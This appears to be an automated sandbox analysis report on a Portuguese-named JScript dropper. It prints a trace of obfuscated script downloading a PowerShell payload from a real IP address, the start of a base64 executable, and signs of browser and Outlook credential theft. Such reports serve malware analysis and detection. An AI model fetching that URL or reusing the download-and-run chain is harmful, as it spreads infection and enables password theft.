Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: pstorec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: pstorec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: cryptbase.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\recover.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts

Jump to behavior

Source:	Binary string: CXZfASD.pdbTFnF source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000009.00000000.1380630778.0000000000012000.00000002.00000001.01000000.00000008.sdmp, JXCJKXCJHKJHXCJHKXCXCJHK.exe.7.dr
Source:	Binary string: c:\Projects\VS2005\WebBrowserPassView\Command-Line\WebBrowserPassView.pdb source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 0000000B.00000002.2523575481.0000000003FC0000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 0000000D.00000002.1476360497.0000000000400000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: CXZfASD.pdb source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000009.00000000.1380630778.0000000000012000.00000002.00000001.01000000.00000008.sdmp, JXCJKXCJHKJHXCJHKXCXCJHK.exe.7.dr

Data Obfuscation

JScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: WScript.Shell%22");IHost.CreateObject("WScript.Shell");IHost.Name();IWshShell3._00000000();ITextStream.WriteLine(" exit:768 o:Windows%20Script%20Host f:CreateObject r:");IHost.Name();ITextStream.WriteLine(" entry:780 o:Windows%20Script%20Host f:CreateObject a0:%22Scripting.FileSystemObject%22");IHost.CreateObject("Scripting.FileSystemObject");IHost.Name();IFileSystem3._00000000();ITextStream.WriteLine(" exit:780 o:Windows%20Script%20Host f:CreateObject r:");ITextStream.WriteLine(" entry:792 f:_0x124ae2 a0:333 a1:%22rN3F%22");ITextStream.WriteLine(" exit:792 f:_0x124ae2 r:%22CreateObject%22");IHost.Name();ITextStream.WriteLine(" entry:788 o:Windows%20Script%20Host f:CreateObject a0:%22MSXML2.XMLHTTP%22");IHost.CreateObject("MSXML2.XMLHTTP");IHost.Name();IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" exit:788 o:Windows%20Script%20Host f:CreateObject r:");ITextStream.WriteLine(" entry:807 f:_0x124ae2 a0:342 a1:%22bofN%22");ITextStream.WriteLine(" exit:807 f:_0x124ae2 r:%22FolderExists%22");IFileSystem3._00000000();ITextStream.WriteLine(" entry:803 o: f:FolderExists a0:%22C%3A%5CTemp%22");IFileSystem3.FolderExists("C:\Temp");IFileSystem3._00000000();ITextStream.WriteLine(" exit:803 o: f:FolderExists r:false");ITextStream.WriteLine(" entry:818 f:_0x49163c a0:336");ITextStream.WriteLine(" exit:818 f:_0x49163c r:%22CreateFolder%22");IFileSystem3._00000000();ITextStream.WriteLine(" entry:814 o: f:CreateFolder a0:%22C%3A%5CTemp%22");IFileSystem3.CreateFolder("C:\Temp");IFileSystem3._00000000();IFolder.Path();ITextStream.WriteLine(" exit:814 o: f:CreateFolder r:C%3A%5CTemp");ITextStream.WriteLine(" entry:1023 f:DownloadScript a0:%22http%3A%2F%2F176.65.144.3%2Fdev%2Fkent.ps1%22 a1:%22C%3A%5CTemp%5CWTRTRWFSHS.ps1%22");ITextStream.WriteLine(" exec:824 f:DownloadScript");ITextStream.WriteLine(" entry:840 f:_0x186c35 a0:338");ITextStream.WriteLine(" exit:840 f:_0x186c35 r:%22Open%22");ITextStream.WriteLine(" entry:845 f:_0x1fde82 a0:348 a1:%22pZ%253%22");ITextStream.WriteLine(" exit:845 f:_0x1fde82 r:%22GET%22");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" entry:836 o: f:Open a0:%22GET%22 a1:%22http%3A%2F%2F176.65.144.3%2Fdev%2Fkent.ps1%22 a2:false");IServerXMLHTTPRequest2.open("GET", "http://176.65.144.3/dev/kent.ps1", "false");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" exit:836 o: f:Open r:undefined");ITextStream.WriteLine(" entry:857 f:_0x186c35 a0:324");ITextStream.WriteLine(" exit:857 f:_0x186c35 r:%22Send%22");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" entry:853 o: f:Send");IServerXMLHTTPRequest2.send();ITextStream.WriteLine(" entry:792 f:_0x124ae2 a0:333 a1:%22rN3F%22");ITextStream.WriteLine(" exit:792 f:_0x124ae2 r:%22CreateObject%22");IHost.Name();ITextStream.WriteLine(" entry:788 o:Windows%20Script%20Host f:CreateObject a0:%22MSXML2.XMLHTTP%22");IHost.CreateObject("MSXML2.XMLHTTP");IHost.Name();IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" exit:788 o:Windows%20Script%20Host f:Creat

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEFAO

Potential obfuscated javascript found

Source: Pagamento Processado.js

Initial file: High amount of function use 6

Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe.7.dr

Static PE information: 0xBF16B7E7 [Tue Aug 4 18:05:27 2071 UTC]

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 11_2_0041D0CF LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,

11_2_0041D0CF

Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe.7.dr	Static PE information: section name: iVN#X-
Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe.7.dr	Static PE information: section name:

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FF88AE700BD pushad ; iretd	7_2_00007FF88AE700C1
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_004570CF push ecx; ret	11_2_004570E2
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_00435226 push ecx; ret	11_2_00435239
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_0045D9ED push esi; ret	11_2_0045D9F6
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_00457A00 push eax; ret	11_2_00457A1E
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_040B2806 push ecx; ret	11_2_040B2819
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_1000B126 push ecx; ret	11_2_1000B139
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_1002344D push esi; ret	11_2_10023456
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_00446B75 push ecx; ret	13_2_00446B85
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_00452BB4 push eax; ret	13_2_00452BC1
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_0044DDB0 push eax; ret	13_2_0044DDC4
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_0044DDB0 push eax; ret	13_2_0044DDEC
Source: C:\Windows\SysWOW64\recover.exe	Code function: 14_2_0044B090 push eax; ret	14_2_0044B0A4
Source: C:\Windows\SysWOW64\recover.exe	Code function: 14_2_0044B090 push eax; ret	14_2_0044B0CC
Source: C:\Windows\SysWOW64\recover.exe	Code function: 14_2_00451D34 push eax; ret	14_2_00451D41
Source: C:\Windows\SysWOW64\recover.exe	Code function: 14_2_00444E71 push ecx; ret	14_2_00444E81
Source: C:\Windows\SysWOW64\recover.exe	Code function: 15_2_00414060 push eax; ret	15_2_00414074
Source: C:\Windows\SysWOW64\recover.exe	Code function: 15_2_00414060 push eax; ret	15_2_0041409C
Source: C:\Windows\SysWOW64\recover.exe	Code function: 15_2_00414039 push ecx; ret	15_2_00414049
Source: C:\Windows\SysWOW64\recover.exe	Code function: 15_2_004164EB push 0000006Ah; retf	15_2_004165C4
Source: C:\Windows\SysWOW64\recover.exe	Code function: 15_2_00416553 push 0000006Ah; retf	15_2_004165C4
Source: C:\Windows\SysWOW64\recover.exe	Code function: 15_2_00416555 push 0000006Ah; retf	15_2_004165C4

Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe.7.dr

Static PE information: section name: iVN#X- entropy: 7.977676207256729

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 11_2_004062E2 ShellExecuteW,URLDownloadToFileW,

11_2_004062E2

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 11_2_0041AC43 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

11_2_0041AC43

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

11_2_0041D0CF

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
